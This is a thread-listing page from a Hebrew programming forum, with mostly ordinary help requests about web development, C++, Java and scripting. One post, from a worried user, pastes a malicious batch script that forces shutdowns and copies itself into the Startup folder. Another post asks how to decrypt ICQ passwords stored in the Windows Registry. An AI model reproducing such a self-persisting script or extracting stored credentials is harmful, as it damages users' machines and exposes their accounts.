תכנות
פורום בנושא תכנות - C, Java, VB, פיתוח אתרי אינטרנט - HTML, CSS, ג'אווה סקריפט, PHP, ASP.NET ועבודה עם שרתים, מערכות ניהול, מאגרי מידע, חברות איחסון ושרותי תחזוקה.
10,067 דיונים בפורום זה
-
שלום, יש לי אתר הכתוב ב- PHP. בין היתר ניתן להעלות לשם קבצים שונים. הייתי מעוניין להוסיף מדיד (bar) שיראה למשתמש כמה אחוזים מהקובץ עלו, מהירות העלאה וכו' אבל הכי חשוב אם יש ממש פרוגרס בר, מדיד שהולך ומתמלא ככל שהקובץ עולה או משהו דומה. אשמח לכל עזרה בנושא.
-
- 1 תגובה
- 705 צפיות
-
-
היי, אני מעונין לבנות כלי שמשחזר את הסיסמאות של ה-ICQ במחשב שעליו מורצת התוכנה (כן, אני יודע שיש מיליון ואחד כלים כאלה כבר) ניסיתי לחפש בגוגל והבנתי שהסיסמא נמצאת ב-Registry, מוצפנת בהסתמך על מספר הסידורי של הכונן הקשיח. לא הצלחתי למצוא איך מפענחים את הסיסמאות המוצפנות ב-Registry - מישהו יודע איך עושים זאת? חשוב לי להדגיש, שאני לא עושה את זה למטרות לא חוקיות, אלא לימוד בלבד (והראיה היא שיש כבר המון כלים שעושים את זה) תודה!
-
- 2 תגובות
- 705 צפיות
-
-
שלום יש לי אתר. בניתי אותו דרך front page בצורה טובה ומסודרת. אבל כל פעם שאני שם את הפירסומת שלי(פרסומת גוגל) למטה באתר, אז באקפלורר האתר מוצג טוב וגם הפירסומת מוצגת בדיוק איפה ששמתי, אבל דווקא בפיירפוקס האתר גם מוצג טוב חוץ מהפירסומת שבמקום שהיא תיהיה למטה ומתחת לכתוב, היא נמצאת ומסיתרה את הכתוב למעלה. מה עושים? אני הכנסתי את הפירסומת(הקוד) עם front page בlayer חדש. בבקשה חברה, אני חייב הפירסומת שתוצג טוב. מה עושים כדי לסדר את הבעיה שלי עם האתר בפיירפוקס? האם אפשר לתקן את הבעיה דרך ה front page ואיך? אם אי אפשר לתקן את הבעיה, אז איך אפשר להכניס את הפירסומת(קוד רגיל) לאתר שלי דרך התוכנה Adobe Dreamweaver CS3. יש לי אותה. תודה לעוזרים, זה ממש חשוב.
-
- 1 תגובה
- 705 צפיות
-
-
יש לי איזה קוד שעובר על קבצים בתיקיה עם שם מסוים, ואני צריך להכניס את השמות שלהם לקובץ כל פעם מחדש או לשנות את שמם למה שכתוב בקובץ. אני מחפש מחזרות שמתארת את כל השמות, כמו *.txt ושיפעל על כל קבצי הטקסט שיש בתיקיה.
-
- 4 תגובות
- 705 צפיות
-
-
התקנתי במחשב שרת IIS ו ברשת הפנימית אני מצליח לגלוש אליו (כמובן שיצרתי אתר ב ASP.NET), איך אני יכול לגלוש למחשב שלי ממחשב שהוא לא ברשת? ע"י הכנסת כתובת הIP החוקית זה לא נותן לי ... מה אני עושה לא טוב ?
-
- 3 תגובות
- 705 צפיות
-
-
מישהו שלח לי משהו ומרוב טיפשותי פתחתי זה היה ריסטרט של אחריי 60 שניות אבל שעשיתי ערוך לקובץ זה מה שהתקבל: SHUTDOWN -C you have a viros euch version 0.1 -T 20 -R V= f V= f W32.netsky.D@mm g h v C:\WINDOWS/system32 START euch.cmd START euch.bat SHUTDOWN -C you_have_virus_euch -T 55 -R START euch.bat COPY euch.cmd "C:\Documents and Settings\All Users\Start Menu\Programs\Startup חשוב שתדעו שלאחר שעשיתי ריסט זה לא חזר על עצמו.. אבל אני נורא דואג ואם תבקשו אעלה את הקובץ.
-
- 4 תגובות
- 705 צפיות
-
-
כיצד אני ממרכז שורת טקסט ב - #C אני רוצה למרכז שורה במסך האפליקציה (מעיין כותרת). תודה מראש.
-
- 1 תגובה
- 705 צפיות
-
-
הגדרתי לו שיהפוך את הכתובת http://domain.com/index?id=1 ל-http://domain.com/pages/1/ ועכשיו כשאני נכנס דרך הכתובת המקוצרת הכתובת של כל התמונות ושל ה-CSS השתנו בעקבות הקיצור, והם לא עובדים. יש לזה פתרון חוץ מלשנות את כל הכתובות?
-
- 0 תגובות
- 705 צפיות
-
-
ורוצה לתרום לי אותו? אני קנית דומיין subgames.net אתר על משחקים ותוכנות ואני לא רוצה לשים איזה PHPBB אז מי יכול לתרום לי? משהו פשוט וקל שהוא תכנת ולא יצא לו לממש את זה והיה רוצה לראות איזה יצירה שלו באתר רציני מישרוצה שיבוא למיילסנג'ר שלי: renan007@speedy.co.il
-
- 0 תגובות
- 705 צפיות
-
-
-
אני מתכנת בC\C++ ואני צריך לכתוב תוכנה שיודע לחלץ ולשנות את התכונות הנרחבות של קבצים במערכת קבצים NTFS (לא מדובר על שם עורך וכו'.. אלא על EA למי שמכיר) שמעתי שקיימות פונקציות : NtSetEaFile ו NtQueryEaFile אבל אני לא יודע כל כך איך להתשמש בהם אם מישהו יודע ויכול לעזור תודה רבה מראש
-
- 4 תגובות
- 704 צפיות
-
-
איך "לוקחים"(אין לי מילה טובה יותר) מאתר את הקוד מקור שלו באמצעות JAVA אני לא מצאתי פתרון לזה אם מישהו יכולת לעזור לי ולתת לי קוד או להפנות אותי למקור מסויים ששם אני יוכל למצוא פתרון תודה
-
- 1 תגובה
- 704 צפיות
-
-
שלום, ליפני כשנה התחלתי לילמוד את השפה C++ מרצון אישי או במילים אחרות "בשביל הכיף" עכשיו אמור להגיע אלי ספר שנועד ללימוד השפה C++ שמו של הספר הוא: ערכת לימוד C++ - למד C++ מהתחלה תוך כדי פיתוח פרויקט. - מדריך למתחילים - אפילו אינם בעלי רקע בתכנות. רציתי לישאול אתכם אם מישהו מכיר את הספר והאם כדי ויעזור לי ליקרוא אותו? (כי את הרוב למדתי ממידע שנמצא באינטרנט) אם זה עוזר למישהו להיזכר אז בכריכה של הספר יש תמונה של שרשרת גדולה והכריכה רובה בצבע אדום (יש גם דיסקט מצורף) ולמעטה כתוב "ג'סי ליברטי" הוצאת פוקוס מחשבים. רציתי לדעת אם הספר יעזור לי להבין בצורה מושלמת (פחות או יותר) את השפה. תודה לעוזרים נ.ב זה כיף להיכנס לעולם הבילתי ניראה
-
- 0 תגובות
- 704 צפיות
-
-
צריך לכתוב פונקציה רקורסיבית שמקבלת מערך המכיל N מספרים שלמים,ומספר שלם כלשהו. הפונקציה צריכה להחזיר את מיקומו של המספר במערך,או -1 אם המספר לא נמצא במערך.
-
- 4 תגובות
- 704 צפיות
-
-
שלום, כיצד אני יכול ב-Visual Basic לשלוח נתונים להתקן כלשהו שמחובר ב-USB?
-
- 4 תגובות
- 704 צפיות
-
-
בס"ד המורה רוצה שאני אעצב אתר מאוד יפה ב-HTML למרות שרק התחלנו ללמוד כלומר להשתמש במה שלמדנו וליצור דף נורא יפה. למדנו לעשות כותרת,את ה-גופן,מרקווי ותמונה ותמונה כרקע.. תוכלו לעשות לי או להעתיק ממקור שאתם יודעים מאיפשהו איזה אתר ממש מושקע עם הדברים הנ"ל?? תודה ל-כ-ל העוזירם תודה רבה!!
-
- 1 תגובה
- 704 צפיות
-
-
אני עוזר למשהו בקשר לאתר אינטרנט הוא רוצה משהו נורא בסיסי שמפרסם סה"כ את העסק שלו,אין צורך ביותר מידי סקריפטים של JAVA או בכלל אין צורך בPHP או אפילו במסד נתונים? האם אפשר לעשות משהו בסיסי שנראה טוב ויזואלית שכולל פלאש ,בעזרת תוכנה ללא כתיבה פיזית של קוד , למרות שיש לי ידע בסיסי בקריאת קוד אין לי זמן להתעסק אם זה יותר מידי . יש תוכנה כלשהיא שאפשר להוציא ממנה תוצאות יפות?
-
- 4 תגובות
- 704 צפיות
-
-
שלום, מישהו מכיר או שמע על חברת itquality בקרוב מאוד יש לי ראיון עבודה בחברה הזו, ואני מעוניין לדעת האם מישהו יכול לתת לי קצת מידע לגבי תחומי פעילות, שכר, תנאים או אפילו האם יש להם מבחנים www.itquality.co.il
-
- 0 תגובות
- 704 צפיות
-
-
קודם כל מקווה שזה המקום הנכון לישאול את זה, אם לא, אני מיצטער מראש. אז השאלה היא כזאת: האם זה אפשרי לשלב מערכת פורומים vBulliten עם מערכת התוכן PHPnuke? וגם אם מישהו יודע, שיתן דרכים ליצירת קשר איתו בבקשה. תודה
-
- 0 תגובות
- 704 צפיות
-
-
המדפסת כוללת גם סורק, מכונת צילום, פרק ופידר. ארצה למשל פונקציה Scan() שמושכת דף אחד מהפידר, סורקת אותו ומחזירה אובייקט Bitmap או מקביל לו. אוכל להסתדר גם עם אפליקציה שניתן להריץ ב-command line שתשמור למשל את התמונה לדיסק. למישהו יש כיוון למשהו כזה?
-
- 2 תגובות
- 704 צפיות
-
-
-
האם יש למישהו הסברים או / ו מדריכים בנוגע לפונקציות ספריה וייצוגן.. כל ה: typedef struct xxx.h וכו'.. תודה מראש
-
- 2 תגובות
- 703 צפיות
-
-
אני רוצה לשנות משהו בקובץ XML, ואין לי מושג בשפה הזאת אני רק רוצה ליישר את הטקסט לצד ימין <option name="%USERNAME%" program="explorer" rollover="rollover\userfolder.png"> <arguement value="%USERPROFILE%"/> </option> מה אני צריך להוסיף כדיי ליישר אותו לימין? (כרגע הוא מיושר לשמאל)
-
- 3 תגובות
- 703 צפיות
-
-
כתבתי סקריפט שאמור להעתיק קובץ מסויים לכול מחשבי הרשת הבעיה שלי היא שאני רוצה לתת למשתמש לבחור את הקובץ מהמחשב ורק אז לבצע את ההעתקה אבל כאשר אני מגיע למצב שאני צריך להעביר קובץ שהוא בעצם קיצור דרך לקובץ אחר הוא מעביר לי את הקובץ המקורי ולא את הקיצור דרך של הקובץ הנה הסקריפט שאם תשתמשו בוא ותבחרו בקובץ קיצור דרך הוא יראה את ה PATH של המקור ולא של קיצור הדרך אך אני מקבל את המיקום של קיצור הדרך כדי שאני יוכל להעתיק אותו ליעד אחר? Dim x Set ObjFSO = CreateObject("UserAccounts.CommonDialog") InitFSO = ObjFSO.ShowOpen If InitFSO = False Then Wscript.Echo "You did not select a file!" Wscript.Quit Else Wscript.Echo "You selected the file: " & ObjFSO.FileName End If
-
- 0 תגובות
- 703 צפיות
-
-
שלום, אני מחפש מימוש ב JAVA לעצי מקטעים- Interval Trees, חיפושיי בגוגל לא העלו שום דבר... מישהו מכיר מימוש כזה, או לפחות אתר שמכיל מימושים למבני נתונים שונים? (אפילו בשפה אחרת). תודה!
-
- 0 תגובות
- 703 צפיות
-


